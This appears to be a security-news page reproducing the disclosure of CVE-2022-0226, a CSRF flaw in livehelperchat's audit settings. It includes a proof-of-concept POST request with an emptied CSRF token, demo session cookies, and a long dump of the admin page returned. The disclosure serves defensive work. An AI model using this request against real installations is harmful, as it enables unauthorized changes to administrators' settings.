Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0226: Cross-Site Request Forgery (CSRF) in livehelperchat

livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)

CVE
Open in Source
#csrf#vulnerability#web#android#windows#js#java

Description

A CSRF issue is found in the audit configuration under settings. It was found that no CSRF token validation is getting done on the server-side. If we remove the CSRF token and keep the CSRF token field empty, the action is getting performed.

Proof of Concept****Request

POST /site_admin/audit/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/audit/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=nq51ir4qicpnju1bdmqjitcuaj
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&days_log=90&log_js=on&StoreOptions=Save

In the above request, you can see that I have removed the CSRf token, and then also the server accepts this request and performs the desired action.

Successful Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 10:30:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Cache-Control: nocache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 02 Jan 1990 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 47652

<!DOCTYPE html><html  lang="en" dir="" ng-app="lhcApp"><head><title ng-non-bindable>Options &laquo; System configuration &laquo; Live Helper Chat - live support</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="icon" type="image/png" href="/design/defaulttheme/images/favicon.ico" /><link rel="shortcut icon" type="image/x-icon" href="/design/defaulttheme/images/favicon.ico"><meta name="Keywords" content="" /><meta name="Description" content="" /><meta name="robots" content="noindex, nofollow"><meta name="copyright" content="Remigijus Kiminas, livehelperchat.com"><link rel="stylesheet" type="text/css" href="/design/defaulttheme/css/css_static/a6692c332b973bd8c9a6ef0bd106e855.css?1641801574" /><script type="text/javascript">var WWW_DIR_JAVASCRIPT = '/site_admin/';var WWW_DIR_JAVASCRIPT_FILES = '/design/defaulttheme/sound';var WWW_DIR_LHC_WEBPACK = '/design/defaulttheme/js/lh/dist/';var WWW_DIR_LHC_WEBPACK_ADMIN = '/design/defaulttheme/js/admin/dist/';var WWW_DIR_JAVASCRIPT_FILES_NOTIFICATION = '/design/defaulttheme/images/notification';var confLH = {};confLH.back_office_sinterval = 10000;confLH.chat_message_sinterval = 3500;confLH.transLation = {"sending":"Sending...","delete_confirm":"Are you sure you want to delete this chat?","new_chat":"New chat request","transfered":"New chat has been transferred to you directly!","edit":"Edit","quote":"Quote","copy":"Copy","copy_group":"Copy all","ask_help":"Ask for help","translate":"Translate","new":"New"};confLH.new_message_sound_user_enabled = 1;confLH.csrf_token = 'ddd6453b3a4966fd49c28edd5975617b';confLH.user_id = '1';confLH.show_alert_transfer = 1;confLH.show_alert = 0;confLH.auto_join_private = 1;confLH.new_message_sound_admin_enabled = 1;confLH.new_message_browser_notification = 0;confLH.new_chat_sound_enabled = 1;confLH.sn_off = 1;confLH.ownntfonly = 0;confLH.accept_chats = 0;confLH.auto_uppercase = 1;confLH.new_dashboard = false;confLH.hide_tabs = 1;confLH.no_scroll_bottom = 0;confLH.scroll_load = 1;confLH.repeat_sound = 1;confLH.repeat_sound_delay = 5;confLH.content_language = 'en';confLH.defaultm_hegiht = '200';confLH.dlist = {'op_n':'10'};confLH.lngUser = 'en';confLH.gmaps_api_key = "";</script><script src="/design/defaulttheme/js/js_static/2961a882a73f1d6f1a235887b4ea364a.js?1641801574"></script></head><body id="admin-body" class="pr-0 " ng-cloak ng-controller="LiveHelperChatCtrl as lhc" ng-init="lhc.getToggleWidget('pending_chats_sort','false');"><nav class="navbar navbar-expand-lg border-bottom p-0 pl-1 top-menu-bar-lhc" translate="no"><a rel="noreferrer" class="navbar-brand back-logo" href="/site_admin/" title="Live Helper Chat"><img class="img-fluid" src="/design/defaulttheme/images/general/logo.png" alt="Live Helper Chat" title="Live Helper Chat"></a><button class="btn border-0 mr-auto btn-outline-secondary" type="button" ng-click="lhc.toggleList('lmtoggle')" title="Expand or collapse left menu" aria-expanded="true" aria-label="Toggle navigation"><span class="material-icons mr-0">menu</span></button><div ng-cloak class="version-updated float-left" ng-if="lhc.lhcPendingRefresh == true || lhc.lhcConnectivityProblem == true || lhc.inActive == true"><div ng-if="lhc.lhcPendingRefresh == true"><i class="material-icons">update</i>This window will be automatically refreshed in {{lhc.lhcVersionCounter}} seconds due to a version update.</div><div ng-if="lhc.lhcConnectivityProblem == true">You have weak internet connection or the server has problems. Try to refresh the  page. Error code {{lhc.lhcConnectivityProblemExplain}}</div><div ng-if="lhc.inActive == true">You went offline because of inactivity. Please close other chat windows if you have any</div></div><button class="navbar-toggler btn border-0 btn-outline-secondary pb-2" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"><span class="material-icons mr-0">menu</span></button><div class="collapse navbar-collapse" id="navbarNavDropdown"><ul class="navbar-nav ml-auto"><li class="list-inline-item nav-item"><a href="#" class="nav-link"><i id="online-offline-user" class="material-icons ng-cloak" ng-click="lhc.changeOnline()" title="Change my status to online/offline" >{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i></a></li><li class="nav-item dropleft"><a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">Remigijus </a><div class="dropdown-menu" style="min-width: 25rem;" role="menu"><div class="row"><div class="col-6"><div class="pl-2 pt-1 font-weight-bold" ng-non-bindable>Hello&nbsp;Remigijus!</div></div><div class="col-6"><a class="dropdown-item pl-2" href="/site_admin/user/account" title="Account"><i class="material-icons">account_box</i>Account</a></div><div class="col-6"><a title="Toggle between dark and white themes" href="/site_admin/front/switchdashboard/(action)/mode" class="csfr-required dropdown-item pl-2"><span class="material-icons">settings_brightness</span>Dark/bright</a></div><div class="col-6"><a class="dropdown-item pl-2 csfr-required" href="/site_admin/user/logout" title="Logout"><i class="material-icons">exit_to_app</i>Logout</a></div></div><hr class="m-0"><div class="row"><div class="col-12"><a href="/site_admin/user/setsetting/auto_uppercase/0" class="csfr-required dropdown-item pl-2"><span class="material-icons">check</span>Auto uppercase sentences</a></div><div class="col-12"><a href="/site_admin/user/setsetting/no_scroll_bottom/1" class="csfr-required dropdown-item pl-2"><span class="material-icons">remove_done</span>Do not scroll to the bottom on chat open</a></div><div class="col-12"><a href="/site_admin/user/setsetting/auto_preload/1" class="csfr-required dropdown-item pl-2"><span class="material-icons">remove_done</span>Auto preload previous visitor chat messages</a></div><div class="col-12"><a href="/site_admin/user/setsetting/scroll_load/0" class="csfr-required dropdown-item pl-2"><span class="material-icons">check</span>Load previous message on scroll</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" onclick="lhinst.disableChatSoundAdmin($(this));event.stopPropagation()" title="Enable/Disable sound about new messages from users"><i class="material-icons" >volume_up</i>New messages</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" onclick="lhinst.disableNewChatSoundAdmin($(this));event.stopPropagation()" title="Enable/Disable sound about new pending chats"><i class="material-icons" >volume_up</i>New chats</a></div></div><hr class="m-0"><div class="row"><div class="col-6"><a href="#" class="dropdown-item pl-2" ng-click="lhc.changeOnline($event)" title="Change my status to online/offline"><i id="online-offline-user" class="material-icons ng-cloak" >{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i>{{lhc.hideOnline == true ? "Offline" : "Online"}}</a></div><div class="col-6"><a href="#" class="dropdown-item pl-2" title="Change my persistent status to online" ng-click="lhc.changeAlwaysOnline($event)"><i class="material-icons ng-cloak"  >{{lhc.hideOnline == true ? 'flash_off' : (lhc.alwaysOnline == true ? 'toggle_on' : 'toggle_off')}}</i>{{lhc.alwaysOnline == true ? "Always online" : "Based on activity"}}</a></div><div class="col-12"><a href="#" class="dropdown-item pl-2" ng-click="lhc.changeVisibility($event)"><i id="vi-in-user" class="material-icons ng-cloak" title="Change my visibility to visible/invisible" >{{lhc.hideInvisible == true ? 'visibility_off' : 'visibility'}}</i>{{lhc.hideInvisible == true ? "Invisible" : "Visible"}}</a></div></div><hr class="m-0"></div></li><li class="li-icon nav-item"><a class="nav-link" ng-click="lhc.toggleList('lmtoggler')" title="Expand or collapse right menu"><span class="material-icons">menu</span></a></li></ul></div></nav><div id="wrapper" ng-cloak ng-class="{toggled: lmtoggle, toggledr : lmtoggler}"><div id="sidebar-wrapper" ng-cloak translate="no"><div class="navbar-light sidebar" role="navigation"><div class="sidebar-nav navbar-collapse"><ul class="nav" id="side-menu"><li class="nav-item"><a class="nav-link" href="/site_admin/" onclick="$('#tabs a[href=\'#dashboard\']').tab('show')"><i class="material-icons md-18">home</i>Dashboard</a></li><li class="nav-item"><a href="#" class="nav-link"><i class="material-icons">chat</i>Chat<i class="material-icons arrow">chevron_right</i></a><ul class="nav nav-second-level"><li class="nav-item"><a class="nav-link" href="#" onclick="javascript:lhinst.chatTabsOpen()"><i class="material-icons">chat</i>Chat tabs</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chat/list" ><i class="material-icons">list</i>Chats list</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/views/home" ><i class="material-icons">saved_search</i>My views</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chat/onlineusers" ><i class="material-icons">face</i>Online visitors</a></li></ul></li><li class="nav-item"><a class="nav-link" href="/site_admin/system/configuration"><i class="material-icons">settings_applications</i>Settings</a></li><li class="nav-item"><a href="#" class="nav-link"><i class="material-icons">info_outline</i>Modules<i class="material-icons arrow md-18">chevron_right</i></a><ul class="nav nav-second-level"><li class="nav-item"><a class="nav-link" href="/site_admin/questionary/list"><i class="material-icons">email</i>Questionary</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/faq/list"><i class="material-icons">help</i>FAQ</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/chatbox/configuration"><i class="material-icons">comment</i>Chatbox</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/browseoffer/index"><i class="material-icons">open_in_browser</i>Browse offers</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/form/index"><i class="material-icons">attachment</i>Forms</a></li><li class="nav-item"><a class="nav-link" href="/site_admin/fbmessenger/index"><i class="material-icons">comment</i>Facebook chat</a></li></ul></li></ul></div></div></div><div id="page-content-wrapper"><div id="path-container" ng-non-bindable><ul class="breadcrumb rounded-0 border-bottom p-2 mb-0" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">
<li class="breadcrumb-item"><a rel="home" itemprop="url" href="/site_admin/"><span itemprop="title">Home</span></a></li><li class="breadcrumb-item" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="/site_admin/system/configuration" itemprop="url"><span itemprop="title">System configuration</span></a></li><li class="breadcrumb-item" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><span itemprop="title">Options</span></li></ul></div><div class="row"><div id="middle-column-page" class="col-xl-9 pb-1"><h1 class="attr-header">Audit Configuration</h1><form action="" method="post" ng-non-bindable><input type="hidden" name="csfr_token" value="ddd6453b3a4966fd49c28edd5975617b" /><div role="alert" class="alert alert-success alert-dismissible fade show"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>Settings updated</div><div class="form-group"><label>How many days keep log?</label><input type="text" class="form-control" name="days_log" value="90" /></div><div class="form-group"><label><input type="checkbox" name="log_js" checked value="on" /> Log javascript errors</label></div><div class="form-group"><label><input type="checkbox" name="log_block"  value="on" /> Log applied blocks</label></div><div class="form-group"><label><input type="checkbox" name="log_user"  value="on" /> Log users changes</label></div><h5>What objects changes log?</h5><div class="row"><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="AutoResponder">Auto Responder</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="CannedMsg">Canned Message</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="Subject">Subject</label></div><div class="col-3"><label><input  type="checkbox" name="log_objects[]" value="Departament">Department</label></div></div><input type="submit" class="btn btn-secondary" name="StoreOptions" value="Save" /></form></div><div class="columns col-xl-3 right-column-page-general" translate="no" id="right-column-page" ng-cloak><div role="tabpanel" ng-show="transfer_dep_chats.list.length > 0 || transfer_chats.list.length > 0"><!-- Nav tabs -->
<ul class="nav nav-pills" role="tablist"><li role="presentation" class="active"><a title="Chats transferred to you directly" href="#transferedperson" aria-controls="transferedperson" role="tab" data-toggle="tab"><i class="material-icons">account_box</i><span class="tru-cnt"></span></a></li><li role="presentation"><a title="Transferred to your department" href="#transfereddep" aria-controls="transfereddep" role="tab" data-toggle="tab"><i class="material-icons">account_box</i><span class="trd-cnt"></span></a></li></ul><!-- Tab panes -->
<div class="tab-content"><div role="tabpanel" class="tab-pane active" id="transferedperson"><div id="right-transfer-chats"><ul class="no-bullet fs12"><li ng-repeat="chat in transfer_chats.list"><img class="action-image right-action-hide" align="absmiddle" ng-click="lhc.startChatTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img class="action-image" align="absmiddle" ng-click="lhc.startChatNewWindowTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p ng-show="transfer_chats.list.length == 0">Empty...</p></div></div><div role="tabpanel" class="tab-pane" id="transfereddep"><div id="right-transfer-departments"><ul class="no-bullet small-list"><li ng-repeat="chat in transfer_dep_chats.list"><img class="action-image right-action-hide" align="absmiddle" ng-click="lhc.startChatTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img class="action-image" align="absmiddle" ng-click="lhc.startChatNewWindowTransfer(chat.id,chat.nick,chat.transfer_id)" src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p ng-show="transfer_dep_chats.list.length == 0">Empty...</p></div></div></div></div><div class="card panel-lhc""><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(user_id)/1"><i class="material-icons chat-active">account_box</i>My active and pending chats ({{my_chats.list.length}}{{my_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('my_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{my_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div id="right-my-chats" ng-show="my_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.mcd.length == 0 ? "All departments" : (lhc.mcd.length == 1 && true ? lhc.mcdNames.join(", ") : '['+lhc.mcd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('mcd',true)" type="checkbox" ng-model="lhc.mcd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.mcd_products" checklist-change="lhc.productChanged('mcd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.mcd_dpgroups" checklist-change="lhc.productChanged('mcd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.mcd_only_explicit_online == true && department.oexp == false) || (lhc.mcd_hide_hidden == true && department.hidden == true) || (lhc.mcd_hide_disabled == true && department.disabled == true) || (lhc.mcd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.mcd" checklist-change="lhc.departmentChanged('mcd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitmc" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="my_chats && my_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Last message" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in my_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event);" class="material-icons">info_outline</a><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.status == 1 ? 'Active' : 'Pending'}}"><i ng-if="chat.status != 1" title="Pending chat" class="material-icons chat-unread">&#xE80E;</i><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.status == 0 ? '&#x23F3; '+chat.wait_time_pending : chat.last_msg_time_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="!my_chats || my_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/0"><i class="material-icons chat-pending">chat</i>Pending chats ({{pending_chats.list.length}}{{pending_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('pending_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{pending_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div id="right-pending-chats" ng-if="pending_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-6 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.pendingd.length == 0 ? "All departments" : (lhc.pendingd.length == 1 && true ? lhc.pendingdNames.join(", ") : '['+lhc.pendingd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('pendingd',true)" type="checkbox" ng-model="lhc.pendingd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_products" checklist-change="lhc.productChanged('pendingd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_dpgroups" checklist-change="lhc.productChanged('pendingd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.pendingd_only_explicit_online == true && department.oexp == false) || (lhc.pendingd_hide_hidden == true && department.hidden == true) || (lhc.pendingd_hide_disabled == true && department.disabled == true) || (lhc.pendingd_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.pendingd" checklist-change="lhc.departmentChanged('pendingd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-4 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul class="dropdown-menu dropdown-lhc" role="menu"><li class="p-1"><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li ng-repeat="userItem in lhc.userList" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingu" checklist-change="lhc.productChanged('pendingu')" checklist-value="userItem.id"><i title="User" class="material-icons">account_box</i>{{userItem.name || userItem.name_official}}</label></li><li ng-show="lhc.userGroups.length > 0" class="border-top"></li><li ng-repeat="userGroup in lhc.userGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.pendingd_ugroups" checklist-change="lhc.productChanged('pendingd_ugroups')" checklist-value="userGroup.id"><i title="User group" class="material-icons">people</i>{{userGroup.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitp" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="pending_chats.list.length > 0"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i><a ng-click="lhc.toggleWidget('pending_chats_sort',true)"><i title="Sort" class="material-icons">{{lhc.toggleWidgetData['pending_chats_sort'] == false ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><i title="Wait time" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in pending_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list" ><a title="Delete chat" class="material-icons float-right" ng-click="lhc.deleteChat(chat.id);$event.stopPropagation()">delete</a><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-show="chat.can_edit_chat" class="material-icons" title="Redirect user to contact form." ng-click="lhc.redirectContact(chat.id,'Are you sure?',$event)">reply</a><a ng-click="lhc.previewChat(chat.id,$event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}<small>{{chat.plain_user_name !== undefined ? ' | ' + chat.plain_user_name : ''}}</small></div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.wait_time_pending}}">{{chat.wait_time_pending}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="pending_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header"><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/1"><i class="material-icons chat-active">chat</i>Active chats ({{active_chats.list.length}}{{active_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('active_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{active_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div id="right-active-chats" ng-show="active_chats_expanded == true"><div class="p-2"><div class="row"><div class="col-6 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.actived.length == 0 ? "All departments" : (lhc.actived.length == 1 && true ? lhc.activedNames.join(", ") : '['+lhc.actived.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('actived',true)" type="checkbox" ng-model="lhc.actived_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_products" checklist-change="lhc.productChanged('actived_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.actived_dpgroups" checklist-change="lhc.productChanged('actived_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.actived_only_explicit_online == true && department.oexp == false) || (lhc.actived_hide_hidden == true && department.hidden == true) || (lhc.actived_hide_disabled == true && department.disabled == true) || (lhc.actived_only_online == true && department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.actived" checklist-change="lhc.departmentChanged('actived')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-4 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light 